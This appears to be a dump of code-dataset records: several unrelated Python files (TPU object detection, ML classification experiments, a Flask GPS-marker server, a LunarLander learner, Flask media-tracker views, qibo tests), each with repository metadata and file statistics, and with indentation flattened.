return labels[predicted_class]
def deleteVoxelFiles():
for f in os.listdir(voxels_files_dir):
os.remove(os.path.join(voxels_files_dir, f))
def read_voxel_file(voxels_file):
row_cnt = 1
Voxel = []
with open(voxels_file, 'r') as file:
header = csv.reader(file, delimiter=',')
for row in header:
if( row_cnt % (voxel_size + 1) != 0) and row[0]!='EOD':
for col in range(voxel_size):
Voxel.append(float(row[col]))
row_cnt += 1
Voxel = np.array(Voxel)
Voxel = Voxel*255.0
Voxel = Voxel.astype(np.uint8)
Voxel = Voxel.reshape(16, 16, 16)
return Voxel
def writein_object_detection_outputs(frame_ID=40, is_first_frame=False):
row_cnt = 0
object_detection_outputs_aux = "../c_algorithm_outputs/object_detection_outputs_aux.csv"
with open(object_detection_outputs, 'r') as f_in, open(object_detection_outputs_aux, 'w') as f_out:
header = csv.reader(f_in, delimiter=',')
writer = csv.writer(f_out, delimiter=',')
for row in header:
row_cnt += 1
if (row_cnt == 1 and is_first_frame == True):
row[1] = '1'
if (row_cnt == 4):
row[0] = str(frame_ID)
writer.writerow(row)
os.system("mv "+ object_detection_outputs_aux + " " + object_detection_outputs)
def loadcsv(csvdata, roi_axes_limits):
box_Xc = []
vel = []
area = []
cnt_csv = 0
with open(csvdata, 'r') as csvFile:
reader = csv.reader(csvFile)
for row in reader:
if cnt_csv == 0:
num_box = int(np.shape(row)[0]) - 2
for x in range (2,len(row) - 1):
box_Xc.append(float(row[x]))
if cnt_csv == 1:
for x in range (0, num_box - 1):
vel.append(float(row[x]))
if cnt_csv == 2:
for x in range (0, num_box - 1):
area.append(float(row[x]))
cnt_csv += 1
csvFile.close()
# Convert XC from pixel dimensions to meters
correctorX = (abs(roi_axes_limits[0][0]) + abs(roi_axes_limits[0][1]))/image_size[0]
for i in range(len(box_Xc)):
box_Xc[i] = box_Xc[i]*correctorX + roi_axes_limits[0][0]
return box_Xc, vel, area
# Coral edgeTPU functions and constants
def make_interpreter(model_file):
model_file, *device = model_file.split('@')
return tflite.Interpreter(
model_path=model_file,
experimental_delegates=[
tflite.load_delegate(EDGETPU_SHARED_LIB,
{'device': device[0]} if device else {})
])
def input_size(interpreter):
"""Returns input image size as (width, height) tuple."""
batch, height, width, channels = interpreter.get_input_details()[0]['shape']
return batch, width, height, channels
def input_tensor(interpreter):
"""Returns input tensor view as numpy array of shape (height, width, 3)."""
tensor_index = interpreter.get_input_details()[0]['index']
return interpreter.tensor(tensor_index)()[0]
def output_tensor(interpreter):
"""Returns dequantized output tensor."""
output_details = interpreter.get_output_details()[0]
output_data = np.squeeze(interpreter.tensor(output_details['index'])())
scale, zero_point = output_details['quantization']
return scale * (output_data - zero_point)
def set_input(interpreter, data):
"""Copies data to input tensor."""
input_tensor(interpreter)[:, :] = data
def get_output(interpreter, top_k=1, score_threshold=0.0):
"""Returns no more than top_k classes with score >= score_threshold."""
scores = output_tensor(interpreter)
classes = [
Class(i, scores[i])
for i in np.argpartition(scores, -top_k)[-top_k:]
if scores[i] >= score_threshold
]
return sorted(classes, key=operator.itemgetter(1), reverse=True)
labels = [ "Car", "Pedestrian", "Truck", "Cyclist"]
Class = collections.namedtuple('Class', ['id', 'score'])
EDGETPU_SHARED_LIB = {
'Linux': 'libedgetpu.so.1',
'Darwin': 'libedgetpu.1.dylib',
'Windows': 'edgetpu.dll'
}[platform.system()]
if __name__ == "__main__":
# execute only if run as a script
os.chdir('../') # Change the dir for the correct working of the C++ functions
main()
| 44.506522 | 217 | 0.640014 | 2,650 | 20,473 | 4.65434 | 0.129434 | 0.100697 | 0.023188 | 0.007946 | 0.506729 | 0.385439 | 0.325928 | 0.294552 | 0.207556 | 0.182828 | 0 | 0.02037 | 0.239877 | 20,473 | 459 | 218 | 44.603486 | 0.772202 | 0.071851 | 0 | 0.212202 | 0 | 0 | 0.100148 | 0.057334 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055703 | false | 0 | 0.023873 | 0 | 0.119363 | 0.04244 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392c38c4087be8ff3e32c8fcba510fcdd3370bb8 | 10,037 | py | Python | scripts/achived/classifcation5.py | nmningmei/metacognition | 734082e247cc7fc9d277563e2676e10692617a3f | [
"MIT"
] | 3 | 2019-07-09T15:37:46.000Z | 2019-07-17T16:28:02.000Z | scripts/achived/classifcation5.py | nmningmei/metacognition | 734082e247cc7fc9d277563e2676e10692617a3f | [
"MIT"
] | null | null | null | scripts/achived/classifcation5.py | nmningmei/metacognition | 734082e247cc7fc9d277563e2676e10692617a3f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 13 13:31:08 2018
@author: nmei
Cross experiment validation
"""
import os
working_dir = '../data/'
import pandas as pd
from tqdm import tqdm
pd.options.mode.chained_assignment = None
import numpy as np
from sklearn.metrics import roc_auc_score
from sklearn.utils import shuffle
from utils import (MCPConverter,
get_features_targets_groups,
make_clfs,
resample_ttest)
graph_dir = os.path.join(working_dir,'graph')
dot_dir = os.path.join(working_dir,'dot')
save_dir = '../results/'
if not os.path.exists(graph_dir):
os.mkdir(graph_dir)
if not os.path.exists(dot_dir):
os.mkdir(dot_dir)
########################### load the data of Exp 1 and Exp 2 #######################
# Exp 1
experiment = 'pos'
pos = pd.read_csv(os.path.join(working_dir,'PoSdata.csv'))
pos = pos[pos.columns[1:]]
# rename columns
pos.columns = ['participant',
'blocks',
'trials',
'firstgabor',
'success',
'tilted',
'correct',
'RT_correct',
'awareness',
'RT_awareness',
'confidence',
'RT_confidence']
# Exp 2
experiment = 'att'
att = pd.read_csv(os.path.join(working_dir,'ATTfoc.csv'))
att = att[att.columns[1:]]
# rename columns
att.columns = ['participant',
'blocks',
'trials',
'firstgabor',
'attention',
'tilted',
'correct',
'RT_correct',
'awareness',
'RT_awareness',
'confidence',
'RT_confidence']
########################################### data is ready ######################
########################################### initialization #####################
np.random.seed(12345)
results = dict(
model = [],
train = [],
test = [],
score_mean = [],
score_std = [],
pval = [],
window = []
)
for n_back in range(11): # loop through the number of trials looking back
# get the features, targets, and subject groups for Exp 2 and the given n_back trial
X_att,y_att,groups_att = get_features_targets_groups(
att,# the loaded dataframe
n_back = n_back, # n_back trials
names = ['attention',# need to normalize to 0 and 1
'awareness',# need to normalize to 0 and 1
'confidence'],# need to normalize to 0 and 1
independent_variables = ['attention',
'awareness',
'confidence'],
dependent_variable = 'correct'
)
X_pos,y_pos,groups_pos = get_features_targets_groups(
pos,
n_back = n_back,
names = ['success',# need to normalize to 0 and 1
'awareness',# need to normalize to 0 and 1
'confidence'],# need to normalize to 0 and 1
independent_variables = ['success',
'awareness',
'confidence'],
dependent_variable = 'correct'
)
##################################################################################
###################### after we prepare the train-test data ######################
###################### we are ready to cross experiment validation ###############
# train at pos and test at att - n_cv = 100
n_cv = 100 # number of cross validation
pr = 0.7 # selected proportion of the data
# select subset of the traiing data and the test data to estimate the variance
# of the cross validation
# select a proportion of the training data
idxs_train = [np.random.choice(len(X_pos),
size = int(pr*len(X_pos)),
replace = False
) for ii in range(n_cv)]
# select 80% of the test data
idxs_test = [np.random.choice(len(X_att),
size = int(pr*len(X_att)),
replace = False
) for ii in range(n_cv)]
# for 2 models, we will perform the cross experiment validation
for model_name in make_clfs().keys():
scores = []
permutation_scores = []
n_permutations = 2000
for idx_train,idx_test in tqdm(zip(idxs_train,idxs_test),desc='cv-{}'.format(model_name)):
clf = make_clfs()[model_name]
X_train = X_pos[idx_train]
y_train = y_pos[idx_train]
X_test = X_att[idx_test ]
y_test = y_att[idx_test ]
clf.fit(X_train,y_train)
preds = clf.predict_proba(X_test)
score = roc_auc_score(y_test,preds[:,-1])
permutation_scores_ = []
for n_permutation in range(n_permutations):
y_test_randome = shuffle(y_test)
permutation_scores_.append(roc_auc_score(
y_test_randome,preds[:,-1]
))
scores.append(score)
permutation_scores.append(permutation_scores_)
permutation_scores = np.array(permutation_scores)
scores = np.array(scores)
# save the results
results['model' ].append(model_name)
results['score_mean'].append(scores.mean())
results['score_std' ].append(scores.std())
results['train' ].append('POS')
results['test' ].append('ATT')
results['window' ].append(n_back)
pval = (np.sum(permutation_scores.mean(0) >= scores.mean()) + 1.0) / (n_permutations + 1)
results['pval' ].append(pval.mean())
print('att,window {},model {},scores = {:.3f}+/-{:.3f},p = {:.4f}'.format(
n_back,model_name,
scores.mean(),scores.std(),pval.mean()))
# train at att and test at pos - n_cv = 100
idxs_train = [np.random.choice(len(X_att),
size = int(pr*len(X_att)),
replace = False
) for ii in range(n_cv)]
idxs_test = [np.random.choice(len(X_pos),
size = int(pr*len(X_pos)),
replace = False
) for ii in range(n_cv)]
#
for model_name in make_clfs().keys():
# print('cv - {}'.format(model_name))
scores = []
permutation_scores = []
n_permutations = 2000
for idx_train,idx_test in tqdm(zip(idxs_train,idxs_test),desc='cv-{}'.format(model_name)):
clf = make_clfs()[model_name]
X_train = X_att[idx_train]
y_train = y_att[idx_train]
X_test = X_pos[idx_test ]
y_test = y_pos[idx_test ]
clf.fit(X_train,y_train)
preds = clf.predict_proba(X_test)
score = roc_auc_score(y_test,preds[:,-1])
permutation_scores_ = []
for n_permutation in range(n_permutations):
y_test_randome = shuffle(y_test)
permutation_scores_.append(roc_auc_score(
y_test_randome,preds[:,-1]
))
scores.append(score)
permutation_scores.append(permutation_scores_)
permutation_scores = np.array(permutation_scores)
scores = np.array(scores)
# save the results
results['model' ].append(model_name)
results['score_mean'].append(scores.mean())
results['score_std' ].append(scores.std())
results['train' ].append('ATT')
results['test' ].append('POS')
results['window' ].append(n_back)
pval = (np.sum(permutation_scores.mean(0) >= scores.mean()) + 1.0) / (n_permutations + 1)
results['pval' ].append(pval.mean())
print('pos,window {},model {},scores = {:.3f}+/-{:.3f},p = {:.4f}'.format(
n_back,model_name,
scores.mean(),scores.std(),pval.mean()))
df = pd.DataFrame(results)
df_corrected = []
for (model,exp_train),df_sub in df.groupby(['model','train']):
# idx_sort = np.argsort(df_sub.pval.values)
# df_sub = df_sub.iloc[idx_sort,:]
pvals = df_sub.pval.values
converter = MCPConverter(pvals = pvals)
d = converter.adjust_many()
df_sub['p_corrected'] = d['bonferroni'].values
df_corrected.append(df_sub)
df_corrected = pd.concat(df_corrected)
df_corrected.to_csv(os.path.join(save_dir,'cross experimnet validation.csv'),
index=False)
import seaborn as sns
sns.set_context('poster')
sns.set_style('whitegrid')
df_corrected = pd.read_csv(os.path.join('../results/cross experimnet validation.csv'))
g = sns.factorplot(x='window',
y='score_mean',
hue='model',
data=df_corrected,
row = 'train',
aspect=2,
dodge = .1,
ci = 99,
kind = 'point',
)
for ax in g.fig.axes:
ax.axhline(0.5,linestyle='--',color='black',alpha=0.5)
(g.set_axis_labels('Trials look back','ROC AUC scores'))
g.fig.suptitle('Cross Experiment Validation\nTrain on one and test on the other',y=1.09)
g.savefig('../figures/Cross Experiment Validation Scores.png',
dpi=400,bbox_inches='tight')
g = sns.factorplot(x='window',
y='p_corrected',
hue='model',
data = df_corrected,
row = 'train',
aspect = 2,
kind = 'bar')
| 34.850694 | 98 | 0.507721 | 1,121 | 10,037 | 4.354148 | 0.215879 | 0.055726 | 0.012293 | 0.020897 | 0.558082 | 0.499898 | 0.477566 | 0.460561 | 0.448679 | 0.431879 | 0 | 0.014515 | 0.347913 | 10,037 | 287 | 99 | 34.972125 | 0.731245 | 0.118561 | 0 | 0.524272 | 0 | 0 | 0.112626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038835 | 0 | 0.038835 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392d149ad0b50198610a97e8e0753d72575eb6b5 | 924 | py | Python | Scoring_Tools/check_stacks_2.py | htpans/htpans | 49b9c6cec007577bde5e8dfbce9acde45be78fbf | [
"MIT"
] | null | null | null | Scoring_Tools/check_stacks_2.py | htpans/htpans | 49b9c6cec007577bde5e8dfbce9acde45be78fbf | [
"MIT"
] | null | null | null | Scoring_Tools/check_stacks_2.py | htpans/htpans | 49b9c6cec007577bde5e8dfbce9acde45be78fbf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 26 17:43:03 2019
@author: Eric Danielson
"""
from skimage import io
import os
import argparse
from tqdm import tqdm
argparser = argparse.ArgumentParser(
description='Train and validate YOLO_v2 model on any dataset')
argparser.add_argument(
'-i',
'--input',
help='path to an image or an video (mp4 format)')
def _main_(args):
image_path = args.input
files = os.listdir(image_path)
for f in tqdm(files):
print("Trying to open " + f)
try:
image = io.imread(image_path + f)
except:
print("File " + f + " is corrupted")
image = "empty"
if image != "empty":
if len(image.shape) < 3:
print("File " + f + " is corrupted")
if __name__ == '__main__':
args = argparser.parse_args()
_main_(args) | 24.315789 | 67 | 0.554113 | 114 | 924 | 4.333333 | 0.614035 | 0.048583 | 0.040486 | 0.048583 | 0.08502 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025848 | 0.330087 | 924 | 38 | 68 | 24.315789 | 0.772213 | 0.089827 | 0 | 0.076923 | 0 | 0 | 0.208281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.153846 | 0 | 0.192308 | 0.115385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392d42b9edf6beeccc22b6acefd045b99b7ec43e | 574 | py | Python | hqtrace_start.py | halucinator/hq-tracer | 67d155142910aec25ef2fc14159cb0ef80a34111 | [
"BSD-3-Clause"
] | 1 | 2021-08-03T01:54:12.000Z | 2021-08-03T01:54:12.000Z | hqtrace_start.py | halucinator/hq-tracer | 67d155142910aec25ef2fc14159cb0ef80a34111 | [
"BSD-3-Clause"
] | null | null | null | hqtrace_start.py | halucinator/hq-tracer | 67d155142910aec25ef2fc14159cb0ef80a34111 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2021 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
# #This script starts the HQTrace Plugin
#@Christopher Wright
#@category HQTracer
#@keybinding alt shift t
#@menupath HQTrace
#@description Trace HALucinator/Qemu addrlist file
from hqtrace_plugin import HQTracePlugin
if __name__ == "__main__":
tool = state.getTool()
hq_trace_plugin = HQTracePlugin(tool, True, True, True)
tool.addPlugin(hq_trace_plugin)
| 35.875 | 85 | 0.773519 | 75 | 574 | 5.746667 | 0.76 | 0.060325 | 0.060325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022541 | 0.149826 | 574 | 15 | 86 | 38.266667 | 0.860656 | 0.630662 | 0 | 0 | 0 | 0 | 0.039801 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392d9ed47279e20510efa86956a52f2d4392ee39 | 2,816 | py | Python | gps_server/server.py | simonfong6/not-kiwi-bot | 9542f328542126b32b2bb2961eea3f4243bdd29f | [
"MIT"
] | 1 | 2018-05-16T00:52:53.000Z | 2018-05-16T00:52:53.000Z | gps_server/server.py | simonfong6/not-kiwi-bot | 9542f328542126b32b2bb2961eea3f4243bdd29f | [
"MIT"
] | null | null | null | gps_server/server.py | simonfong6/not-kiwi-bot | 9542f328542126b32b2bb2961eea3f4243bdd29f | [
"MIT"
] | 1 | 2020-09-24T17:58:34.000Z | 2020-09-24T17:58:34.000Z | #!/env/usr/bin python
"""
server.py
Tool to visualize GPS coordinates for donkeycar.
"""
from flask import Flask, request, send_from_directory, jsonify
import json
# File that stores the GPS markers
DATA_FILE = 'data.json'
# JSON status messages
SUCCESS = {'status' : {'success': True}}
FAIL = {'status': {'success': False}}
app = Flask(__name__)
def overwrite(some_file, data):
""" Overwrite the entire file with the new dictionary.
"""
some_file.seek(0) # Go to the beginning of the file
json.dump(data, some_file, indent=4) # Dump all the data
some_file.truncate() # Need this not sure why. TODO
@app.route('/')
def index():
""" Serve the index page.
"""
return send_from_directory('.', 'index.html')
@app.route('/favicon.ico')
def favicon():
""" Serve the favicon.
"""
return send_from_directory('.', 'favicon.ico')
@app.route('/markers')
def get_markers():
""" Reads from the data file and returns the markers as JSON.
"""
with open(DATA_FILE, 'r') as f:
data = json.load(f)
return jsonify(data)
@app.route('/markers/replace', methods=['GET','POST'])
def replace_markers():
""" Replaces all markers in the data file with the ones given.
"""
markers = request.json['markers']
print(json.dumps(markers, indent=4))
data = {'markers': markers}
with open(DATA_FILE, 'r+') as f:
overwrite(f,data)
return jsonify(SUCCESS)
@app.route('/markers/add', methods=['GET','POST'])
def add_markers():
""" Appends a given marker to the data file.
"""
marker = request.json['marker']
with open(DATA_FILE, 'r+') as f:
# Load the data from file as a dictionary.
data = json.load(f)
# Add the marker to the dictionary.
data['markers'].append(marker)
# Overwrite the entire file with the new dictionary.
overwrite(f,data)
return jsonify(SUCCESS)
@app.route('/markers/update', methods=['GET','POST'])
def update_markers():
""" Update or add markers from the front-end
"""
marker = request.json
label = marker['label']
with open(DATA_FILE, 'r+') as f:
data = json.load(f)
updated = False
for index,marker_db in enumerate(data['markers']):
if(marker_db['label'] == label):
data['markers'][index]['position'] = marker['position']
print("FOUND")
updated = True
if(not updated):
data['markers'].append(marker)
print("NOT FOUND")
overwrite(f,data)
return jsonify(SUCCESS)
if(__name__ == '__main__'):
app.run(host='0.0.0.0', port=3148)
| 24.920354 | 77 | 0.580256 | 352 | 2,816 | 4.548295 | 0.298295 | 0.039975 | 0.037477 | 0.039975 | 0.201124 | 0.201124 | 0.179888 | 0.154903 | 0.102436 | 0.041224 | 0 | 0.005419 | 0.279119 | 2,816 | 112 | 78 | 25.142857 | 0.783251 | 0.236151 | 0 | 0.25 | 0 | 0 | 0.120879 | 0 | 0 | 0 | 0 | 0.008929 | 0 | 1 | 0.125 | false | 0 | 0.035714 | 0 | 0.267857 | 0.053571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392ece3eab4fceea4640046a996ab12e285120cf | 6,635 | py | Python | lunarlander/learn.py | brianquinlan/learn-machine-learning | 275284eafdeb4e0140ab5d877e06d3258f7b590a | [
"MIT"
] | 1 | 2018-05-10T02:55:15.000Z | 2018-05-10T02:55:15.000Z | lunarlander/learn.py | brianquinlan/learn-machine-learning | 275284eafdeb4e0140ab5d877e06d3258f7b590a | [
"MIT"
] | null | null | null | lunarlander/learn.py | brianquinlan/learn-machine-learning | 275284eafdeb4e0140ab5d877e06d3258f7b590a | [
"MIT"
] | null | null | null | # Copyright 2019 Brian Quinlan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Learn how to play "Well Bouncer Game" using machine learning."""
import argparse
import os.path
import pickle
import signal
import warnings
import gym
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegression, SGDClassifier
import sklearn.exceptions
import tqdm
import model
def _make_move(agent, state):
probs = agent.predict_proba([state])[0]
a = np.random.choice(agent.classes_, p=probs)
return a
def _select_elites(states_batch, actions_batch, rewards_batch, percentile=50):
reward_threshold = np.percentile(rewards_batch, percentile)
elite_reward_indices = [
i
for i in range(len(rewards_batch))
if rewards_batch[i] > reward_threshold
]
elite_states = []
elite_actions = []
elite_scores = []
for i in elite_reward_indices:
elite_states.extend(states_batch[i])
elite_actions.extend(actions_batch[i])
elite_scores.append(rewards_batch[i])
return elite_states, elite_actions, elite_scores
def _generate_session(agent, env, state):
states = []
actions = []
total_reward = 0
while True:
states.append(state)
action = _make_move(agent, state)
state, reward, done, _ = env.step(action)
actions.append(action)
total_reward += reward
if done:
break
return states, actions, total_reward
def _train_one_state(agent, game, num_tries, elite_percentile, stop_checker):
env = gym.make(game)
initial_state = env.reset()
cenv = pickle.dumps(env)
state_lists = []
action_lists = []
scores = []
for _ in tqdm.tqdm(
range(num_tries), leave=False, ncols=31, bar_format="{bar}"
):
states, actions, score = _generate_session(
agent, pickle.loads(cenv), initial_state
)
if stop_checker():
return [], [], []
state_lists.append(states)
action_lists.append(actions)
scores.append(score)
elite_states, elite_actions, elite_scores = _select_elites(
state_lists, action_lists, scores, elite_percentile
)
return elite_states, elite_actions, elite_scores
def _self_train_once(
agent,
game,
num_games,
num_trials_per_game,
elite_percentile_per_state,
stop_checker,
):
combined_states = []
combined_actions = []
combined_scores = []
for _ in tqdm.tqdm(
range(num_games), leave=False, ncols=31, bar_format="{bar}"
):
states, actions, scores = _train_one_state(
agent,
game,
num_trials_per_game,
elite_percentile_per_state,
stop_checker,
)
if stop_checker():
return
combined_states.extend(states)
combined_actions.extend(actions)
combined_scores.extend(scores)
print(
"{:10.1f} {:10}".format(
np.mean(combined_scores), len(combined_states),
)
)
with warnings.catch_warnings():
warnings.simplefilter(
"ignore", category=sklearn.exceptions.ConvergenceWarning
)
agent.fit(combined_states, combined_actions)
def main():
stop = False
def quit_handler(signum, frame):
nonlocal stop
stop = True
print("Quitting...")
signal.signal(signal.SIGINT, quit_handler)
parser = argparse.ArgumentParser(
description='Learn how to play "Well Bouncer".'
)
parser.add_argument(
"--model-file",
required=True,
help=(
"The file to use when loading and saving the "
"agent trained using machine learning. If the "
"file does not exist then a new one will be "
"created."
),
)
parser.add_argument(
"--agent-type",
choices=["logistic-regression", "mlp-classifier", "sgd-classifier"],
default="logistic-regression",
help="The type of machine learning agent to use.",
)
parser.add_argument(
"--num-games",
type=int,
default=100,
help=(
"The number of games to play before selecting the best ones for "
"training"
),
)
parser.add_argument(
"--num-trials-per-game",
type=int,
default=100,
help=(
"The number of games to play before selecting the best ones for "
"training"
),
)
parser.add_argument(
"--elite-percentile-per-state",
type=float,
default=50,
help=(
"The quality that a game must have (in terms of score) to be "
"selected for training."
),
)
args = parser.parse_args()
if args.model_file and os.path.exists(args.model_file):
m = pickle.load(open(args.model_file, "rb"))
if not isinstance(m, model.Model):
m = model.Model(m, "LunarLander-v2")
else:
if args.agent_type == "logistic-regression":
agent = LogisticRegression(solver="lbfgs", multi_class="auto")
elif args.agent_type == "sgd-classifier":
agent = SGDClassifier(loss="log", max_iter=1)
elif args.agent_type == "mlp-classifier":
agent = MLPClassifier(
hidden_layer_sizes=(10, 10, 10, 10), warm_start=True
)
agent.fit(
[np.array([0.5 for _ in range(8)])] * 4, list(range(4)),
)
m = model.Model(agent, "LunarLander-v2")
print(
"{:>10} {:>9.0f}% {:>10}".format(
"MEAN", args.elite_percentile_per_state, "KEPT"
)
)
print("{:>10} {:>10} {:>10}".format("====", "===", "===="))
while not stop:
_self_train_once(
m.agent,
m.game,
args.num_games,
args.num_trials_per_game,
args.elite_percentile_per_state,
lambda: stop,
)
pickle.dump(m, open(args.model_file, "wb"))
if __name__ == "__main__":
main()
| 27.417355 | 78 | 0.609495 | 784 | 6,635 | 4.970663 | 0.327806 | 0.026944 | 0.023095 | 0.02951 | 0.201437 | 0.175263 | 0.132923 | 0.119066 | 0.096998 | 0.075443 | 0 | 0.012005 | 0.284401 | 6,635 | 241 | 79 | 27.53112 | 0.808762 | 0.09254 | 0 | 0.219895 | 0 | 0 | 0.131767 | 0.008163 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036649 | false | 0 | 0.062827 | 0 | 0.13089 | 0.020942 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3933365abb5430b754b10a4e77d9d9f75fd097cc | 3,001 | py | Python | MediaTracker/views/views_main.py | sarahbeharrygoss/MediaTracker | 3df8ae27534ed5c9933cc4944b90372d5f569692 | [
"MIT"
] | null | null | null | MediaTracker/views/views_main.py | sarahbeharrygoss/MediaTracker | 3df8ae27534ed5c9933cc4944b90372d5f569692 | [
"MIT"
] | null | null | null | MediaTracker/views/views_main.py | sarahbeharrygoss/MediaTracker | 3df8ae27534ed5c9933cc4944b90372d5f569692 | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
from MediaTracker.flask_app_and_db import flask_app as app
from MediaTracker import models
from flask import render_template, request
from MediaTracker.forms import MediaForm
from MediaTracker.controllers import media_controller, tag_controller
from urllib.parse import urlencode
from collections import OrderedDict
@app.route('/', methods=['GET', 'POST'])
def index():
tag_id = request.args.get('filter_by_tag') or request.args.get('selected_tag')
sortcode = request.args.get('do_sort') or request.args.get('selected_sort')
media_list = media_controller.get_all_media(tag_id, sortcode)
form = create_new_media_form()
compressed = request.args.get('compressed')
return render_template('index.html',
media_list=media_list,
mediaForm=form,
filter_tag=tag_controller.get_tag(tag_id) if tag_id else None,
sort=sortcode,
compressed=compressed,
query_string=create_query_string(tag_id, sortcode, compressed),
create_query_string=create_query_string,
create_episode_string=create_episode_string)
# Helper functions
def create_query_string(tag_id, sortcode, compressed):
settings = {k: v for k, v in OrderedDict(selected_tag=tag_id,
selected_sort=sortcode,
compressed=compressed).items() if v}
return urlencode(settings)
def create_episode_string(media):
return 'Current episode: ' + ('%.12g' % media.current_episode.episode_number
if media.current_episode else 'Not started')
def create_new_media_form(media=None):
form = MediaForm()
# Need to populate episode dropdown choices, otherwise null error during validation
if media:
form.current_episode_id.query = media_controller.get_episodes_for_media_query(media.id).order_by(
models.Episode.episode_number)
form.tags.choices = [(tag.id, tag.name) for tag in tag_controller.get_all_tags()]
form.tags.data = [tag.id for tag in media.tags]
return form
def read_media_form(media=None):
form = MediaForm()
# Need to populate episode dropdown choices, otherwise null error during validation
if media:
form.current_episode_id.query = media_controller.get_episodes_for_media_query(media.id).order_by(
models.Episode.episode_number)
form.tags.choices = [(tag.id, tag.name) for tag in tag_controller.get_all_tags()]
return form
# Error pages
@app.errorhandler(404)
def not_found_error(error):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_error(error):
return render_template('500.html'), 500
@app.errorhandler(503)
def method_not_supported(error):
return render_template('500.html'), 503
| 34.895349 | 105 | 0.676774 | 374 | 3,001 | 5.179144 | 0.248663 | 0.025813 | 0.036138 | 0.03872 | 0.416107 | 0.353123 | 0.320083 | 0.278782 | 0.278782 | 0.278782 | 0 | 0.012697 | 0.23892 | 3,001 | 85 | 106 | 35.305882 | 0.835377 | 0.063979 | 0 | 0.214286 | 0 | 0 | 0.046362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.071429 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393450fc2d2715e9100e072a54294b73919a49e9 | 11,446 | py | Python | src/qibo/tests/test_core_hamiltonians.py | renatomello/qibo | 20c6f3f22effbeccd5d31ed456717f9bee449e0c | [
"Apache-2.0"
] | null | null | null | src/qibo/tests/test_core_hamiltonians.py | renatomello/qibo | 20c6f3f22effbeccd5d31ed456717f9bee449e0c | [
"Apache-2.0"
] | null | null | null | src/qibo/tests/test_core_hamiltonians.py | renatomello/qibo | 20c6f3f22effbeccd5d31ed456717f9bee449e0c | [
"Apache-2.0"
] | 1 | 2022-03-28T17:52:46.000Z | 2022-03-28T17:52:46.000Z | """Test methods in `qibo/core/hamiltonians.py`."""
import pytest
import numpy as np
from scipy import sparse
from qibo import hamiltonians, K
from qibo.tests.utils import random_complex
def random_sparse_matrix(n, sparse_type=None):
if K.name in ("qibotf", "tensorflow"):
nonzero = int(0.1 * n * n)
indices = np.random.randint(0, n, size=(nonzero, 2))
data = np.random.random(nonzero) + 1j * np.random.random(nonzero)
data = K.cast(data)
return K.sparse.SparseTensor(indices, data, (n, n))
else:
re = sparse.rand(n, n, format=sparse_type)
im = sparse.rand(n, n, format=sparse_type)
return re + 1j * im
def test_hamiltonian_init():
with pytest.raises(TypeError):
H = hamiltonians.Hamiltonian(2, "test")
